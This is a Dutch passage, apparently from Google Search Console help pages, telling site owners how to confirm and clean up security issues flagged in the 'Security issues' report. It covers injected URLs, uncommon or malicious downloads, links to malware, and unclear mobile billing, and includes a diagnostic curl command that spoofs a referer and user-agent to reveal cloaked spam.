3. Schoon je site op

Wanneer je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content en links met spam verwijderen van elke pagina. Zorg ervoor dat je alle hackingacties corrigeert die worden weergegeven in het rapport 'Beveiligingsproblemen'. Zoek daarnaast naar andere pagina's op je site die mogelijk zijn gehackt. Gebruik hiervoor een zoekopdracht met 'site:' op Google en zoek in de bronbestanden van je website.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.

4. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Type hackingactie: URL-invoeging

Een hacker heeft nieuwe pagina's op je site gemaakt, die vaak woorden of links met spam bevatten. Soms bevatten deze nieuwe pagina's code die ongewenst gedrag veroorzaakt, zoals je gebruikers omleiden naar andere sites of je webserver laten deelnemen aan een denial-of-service-aanval tegen andere sites.

1. Bepaal of je dit kunt verhelpen

Bekijk het artikel Een ondersteuningsteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.

2. Bevestig het probleem

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Vraag de voorbeeld-URL's in het rapport aan om te controleren of ze actief zijn. Je hebt deze pagina's waarschijnlijk niet zelf gemaakt, dus je moet de pagina's van je site verwijderen of de code verwijderen waarmee de pagina's automatisch worden gegenereerd. Bekijk meer informatie over hoe je deze pagina's op je site kunt vinden en opschonen.

Je kunt ook een zoekopdracht met 'site:' uitvoeren om pagina's te vinden die je niet hebt gemaakt.

  • Op een kleine site kun je naar [site:example.com] zoeken op Google Zoeken om een lijst met pagina's weer te geven die we hebben geïndexeerd. In deze lijst kun je zien of er pagina's zijn die je niet hebt gemaakt.
  • Voor grotere sites kun je een specifiekere zoekopdracht uitvoeren, zoals:
    • [site:example.com apotheek]: Hiermee worden alle pagina's op example.com weergegeven die het woord 'apotheek' bevatten. Je kunt ook andere veelvoorkomende spamtermen gebruiken.
    • [site:example.com/wp-admin/]: Hiermee worden alle pagina's in het sitebeheergedeelte van je WordPress-site weergegeven.

3. Schoon je site op

Wanneer je klaar bent om je site op te schonen, kun je de betreffende directory's vervangen door de laatste goede back-up of kun je de ongewenste pagina's verwijderen, evenals de bestanden of functies die de hacker heeft gebruikt om ze te maken.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.

4. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Ongebruikelijke downloads

Op je site wordt een download aangeboden die Google Safe Browsing niet eerder heeft gezien. De Chrome-browser kan een waarschuwing geven dat dit niet vaak wordt gedownload en mogelijk gevaarlijk is. Deze waarschuwingen worden automatisch ingetrokken als Google Safe Browsing kan verifiëren dat de bestanden veilig zijn.

1. Verhelp het probleem

Zoek je downloads en controleer of deze voldoen aan de richtlijnen voor downloads. Als een van de downloads in strijd is met deze richtlijnen, verwijder je de betreffende download. Als de downloads niet in strijd zijn met deze richtlijnen, hoef je ze niet te verwijderen. Vraag gewoon een beoordeling aan, zoals hierna wordt beschreven. Houd er rekening mee dat er niet altijd voorbeeld-URL's worden weergegeven voor dit probleem.

2. Vraag een beoordeling aan

Wanneer je de bestanden hebt verwijderd (of hebt geverifieerd dat je downloads voldoen aan de richtlijnen), vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Schadelijke downloads

Je site biedt gebruikers een download waarvan Google Safe Browsing denkt dat het malware of ongewenste software. De Chrome-browser kan een waarschuwing weergeven wanneer een gebruiker je site bezoekt. Je moet deze downloads van je site verwijderen om de waarschuwing te verwijderen.

1. Beoordeel het probleem

Als je deze downloads bewust hebt toegevoegd, verwijder je ze van je site en ga je door naar Een beoordeling aanvragen.

Als je niets weet over downloads op je site, is je site mogelijk gehackt. Je moet je gehackte site corrigeren en de downloads zoeken en verwijderen.

2. Bepaal of je dit kunt verhelpen

Bekijk het artikel Een ondersteuningsteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.

3. Bevestig het probleem

Bekijk enkele van de voorbeeldpagina's op je site om de aanwezigheid van deze downloads te bevestigen.

4. Schoon je site op

Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt. Wanneer je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen. Gebruik antivirussoftware om de binaire bestanden en andere content te scannen die op je site wordt gehost. Antivirussoftware vindt veel van de verschillende typen malware en ongewenste software, maar niet alle. Als je je software indient bij een antivirusprogramma (of een antivirusconsolidatieservice, zoals VirusTotal), krijg je een indicatie van potentiële problemen met je software. Google Safe Browsing past eigen criteria toe om te bepalen of een programma of binair bestand ongewenste software of malware is.

5. Bevestig je oplossingen

Zorg ervoor dat je site voldoet aan het beleid ten aanzien van ongewenste software.

6. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Links naar schadelijke downloads

Je site bevat links naar sites waarop downloads worden aangeboden die volgens Google Safe Browsing malware of ongewenste software zijn. De Chrome-browser kan een waarschuwing weergeven wanneer een gebruiker je site bezoekt. Je moet links naar de schadelijke sites verwijderen om de waarschuwing te verwijderen.

1. Beoordeel het probleem

Als je deze links bewust hebt toegevoegd, verwijder je ze van je site en ga je door naar Een beoordeling aanvragen.

Als je niets weet over deze links, is je site mogelijk gehackt.

2. Bepaal of je dit kunt verhelpen

Als je site is gehackt, bekijk je het artikel Een ondersteuningsteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.

3. Bevestig het probleem

 

Bekijk enkele van de voorbeeldpagina's op je site om de aanwezigheid van deze downloads te bevestigen. In sommige gevallen kunnen hackers deze links verbergen als ze denken dat je de eigenaar van de site bent. Probeer de voorbeeld-URL's te bezoeken met de URL-inspectietool of terwijl je bent ingelogd op een ander account of een andere computer.

4. Schoon je site op

Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt. Wanneer je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen.

5. Bevestig je oplossingen

Zorg ervoor dat je site voldoet aan het beleid ten aanzien van ongewenste software.

6. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Onduidelijke mobiele facturering

Als Google heeft vastgesteld dat je site gebruikers onvoldoende informeert over mobiele kosten, kan Chrome een waarschuwing weergeven voordat de gebruiker een pagina laadt waarvoor kosten in rekening worden gebracht.

1. Bevestig het probleem

Ga naar de voorbeeld-URL's in het rapport om te bekijken welke pagina's gedrag met betrekking tot onduidelijke mobiele facturering vertonen. Bekijk de richtlijnen voor mobiele facturering.

2. Verhelp het probleem

Corrigeer je pagina's zodat ze voldoen aan de richtlijnen voor mobiele facturering.

3. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Wat is het verschil tussen het rapport 'Handmatige acties' en het rapport 'Beveiligingsproblemen'?

In het rapport 'Handmatige acties' worden problemen met een pagina of site vermeld. Dit zijn meestal pogingen om onze zoekindex te manipuleren die niet noodzakelijkerwijs gevaarlijk zijn voor gebruikers. De meeste problemen die hier worden gemeld, leiden ertoe dat de pagina of site een lagere positie krijgt of wordt weggelaten uit zoekresultaten zonder enige visuele indicatie voor de gebruiker.

Het rapport Beveiligingsproblemen vermeldt aanwijzingen dat je site is gehackt of gedrag op je site dat potentieel schadelijk is voor een bezoeker of zijn computer (bijvoorbeeld: phishingaanvallen of het installeren van malware of ongewenste software op de computer van de gebruiker). Deze pagina's kunnen met een waarschuwingslabel worden weergegeven in zoekresultaten. De browser kan ook een interstitial waarschuwingspagina weergeven wanneer een gebruiker de betreffende pagina's probeert te bezoeken.

Was dit nuttig?
Hoe kunnen we dit verbeteren?